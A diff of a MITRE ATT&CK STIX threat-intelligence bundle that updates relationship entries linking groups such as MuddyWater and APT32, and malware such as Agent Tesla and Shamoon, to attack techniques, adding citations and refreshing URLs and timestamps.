- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has controlled [POWERSTATS](https://attack.mitre.org/software/S0223) from behind a proxy network to obfuscate the C2 location.(Citation: Symantec MuddyWater Dec 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has controlled [POWERSTATS](https://attack.mitre.org/software/S0223) from behind a proxy network to obfuscate the C2 location.(Citation: Symantec MuddyWater Dec 2018) [MuddyWater](https://attack.mitre.org/groups/G0069) has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).(Citation: Reaqta MuddyWater November 2017)",
"id": "relationship--cc78f0a1-7f4f-491e-a636-910f09d0c5a1",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
"type": "relationship",
- "modified": "2020-03-23T16:16:37.536Z",
+ "modified": "2020-05-18T19:04:38.153Z",
"created": "2019-01-30T17:33:40.928Z"
},
{
@@ -96276,16 +97432,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-16T17:48:06.698Z",
+ "modified": "2020-04-21T23:09:31.610Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -96458,28 +97614,33 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
"type": "relationship",
- "modified": "2020-03-25T16:25:17.401Z",
+ "modified": "2020-06-09T20:44:40.783Z",
"created": "2017-05-31T21:33:27.017Z"
},
{
"id": "relationship--fe4ed27a-6d45-4e6a-bbc0-7ebe15a38046",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can delete all files created during its execution.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can delete all files created during its execution.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.052Z",
+ "modified": "2020-06-16T20:51:13.951Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -96993,15 +98154,15 @@
{
"id": "relationship--3a8d8063-3f4d-420d-8c72-2b99077aa487",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
@@ -97017,13 +98178,18 @@
"description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
"url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
"source_name": "ESET OceanLotus Mar 2019"
+ },
+ {
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.468Z",
+ "modified": "2020-04-29T15:17:18.866Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -97040,12 +98206,12 @@
"url": "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A"
}
],
- "source_ref": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--15489699-7ea0-473f-a4cd-5bc9e05e2104",
@@ -97121,14 +98287,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T02:25:11.709Z",
+ "modified": "2020-06-29T01:54:53.453Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -97145,12 +98311,12 @@
"url": "https://securelist.com/the-epic-turla-operation/65545/"
}
],
- "source_ref": "malware--80a014ba-3fef-4768-990b-37d8bd10d7f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--80a014ba-3fef-4768-990b-37d8bd10d7f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b"
},
{
"id": "relationship--8272bde7-817f-4cb4-b073-67859002d310",
@@ -97386,12 +98552,12 @@
"url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
}
],
- "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a"
},
{
"id": "relationship--b9f4c6ef-d0bd-4651-9445-4705e1fd85f2",
@@ -97428,12 +98594,12 @@
"url": "http://www.secpod.com/blog/winexe/"
}
],
- "source_ref": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--96fd6cc4-a693-4118-83ec-619e5352d07d",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4"
},
{
"id": "relationship--98abda72-4760-4e8c-ab6c-5ed080868cfc",
@@ -97722,16 +98888,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.165Z",
+ "modified": "2020-05-14T15:14:33.561Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -97963,16 +99128,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.069Z",
+ "modified": "2020-05-12T22:13:17.030Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -98113,12 +99278,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--b35068ec-107a-4266-bda8-eb7036267aea",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--dc4e54ed-ca71-4dd1-a61e-714222c0c76d",
@@ -98173,14 +99338,14 @@
"target_ref": "malware--5f9f7648-04ba-4a9f-bb4c-2a13e74572bd",
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
"description": "(Citation: Palo Alto Gamaredon Feb 2017)",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.674Z",
+ "modified": "2020-06-22T17:54:16.008Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -98424,22 +99589,15 @@
{
"id": "relationship--808f140e-8b7b-4efa-8708-2f2308b2fc41",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.(Citation: SecureWorks Mia Ash July 2017)",
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "external_references": [
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- }
- ],
"source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
"relationship_type": "uses",
"target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
"type": "relationship",
- "modified": "2019-09-09T19:21:42.477Z",
+ "modified": "2020-07-04T23:30:04.980Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -98645,15 +99803,15 @@
{
"id": "relationship--ea7c1a9f-7d8e-4a06-8331-9901a33ee7d8",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
@@ -98664,13 +99822,18 @@
"description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
"url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
"source_name": "ESET OceanLotus Mar 2019"
+ },
+ {
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"type": "relationship",
- "modified": "2020-03-12T00:31:45.478Z",
+ "modified": "2020-04-30T17:45:55.110Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -99286,16 +100449,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.770Z",
+ "modified": "2020-06-02T16:14:00.608Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -99414,12 +100577,12 @@
"url": "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/"
}
],
- "source_ref": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--f7ded6a1-043e-437a-8a0c-00ded73e5289",
@@ -99435,12 +100598,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99"
}
],
- "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4"
},
{
"id": "relationship--0d3e115b-ff08-4bff-8802-be3d21cec68f",
@@ -99491,18 +100654,23 @@
],
"external_references": [
{
- "source_name": "Talos Agent Tesla Oct 2018",
+ "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.",
"url": "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html",
- "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018."
+ "source_name": "Talos Agent Tesla Oct 2018"
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)(Citation: Bitdefender Agent Tesla April 2020)",
"id": "relationship--60c1b489-f1fc-4568-aba0-54e932715abc",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
"type": "relationship",
- "modified": "2020-03-16T17:48:41.398Z",
+ "modified": "2020-05-20T13:38:07.318Z",
"created": "2019-01-29T18:44:05.077Z"
},
{
@@ -99580,13 +100748,13 @@
"source_name": "Unit 42 Tropic Trooper Nov 2016"
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) searches for anti-virus software running on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) can search for anti-virus software running on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)",
"id": "relationship--cdefab78-5d90-4e89-8664-5bbd30ab1517",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.218Z",
+ "modified": "2020-05-29T03:23:28.079Z",
"created": "2019-01-29T20:17:49.232Z"
},
{
@@ -99786,16 +100954,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.160Z",
+ "modified": "2020-05-14T15:14:33.565Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -100179,9 +101346,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -100193,7 +101360,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.767Z",
+ "modified": "2020-06-02T16:14:00.488Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -100550,16 +101717,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-17T00:28:02.206Z",
+ "modified": "2020-04-21T23:09:31.867Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -100660,12 +101827,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--44090eb6-1166-4986-8583-60dcc8e69cc7",
@@ -100681,12 +101848,12 @@
"url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
}
],
- "source_ref": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--f5fee3da-a3ef-4a81-a70c-9660ab1fb3d6",
@@ -100712,7 +101879,7 @@
{
"id": "relationship--7e7d5aa9-6860-44fe-88b9-22a6b36162e2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update.(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. [APT32](https://attack.mitre.org/groups/G0050) has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe. (Citation: Cybereason Cobalt Kitty 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -100727,7 +101894,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"type": "relationship",
- "modified": "2020-03-17T23:17:10.052Z",
+ "modified": "2020-06-29T17:55:52.939Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -100845,15 +102012,20 @@
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
"url": "https://securelist.com/muddywater/88059/",
"source_name": "Securelist MuddyWater Oct 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to obtain a list of running processes on the system.(Citation: Securelist MuddyWater Oct 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to obtain a list of running processes on the system.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)",
"id": "relationship--9f81120a-adde-47cc-95bc-cd8201eb0a11",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.761Z",
+ "modified": "2020-05-18T17:43:37.053Z",
"created": "2019-01-30T17:33:40.978Z"
},
{
@@ -101137,22 +102309,27 @@
{
"id": "relationship--73a53379-746e-46db-b101-1fc45df5e458",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d to execute the payload.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d to execute the payload. [Shamoon](https://attack.mitre.org/software/S0140) can also spread via [PsExec](https://attack.mitre.org/software/S0029).(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December19 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
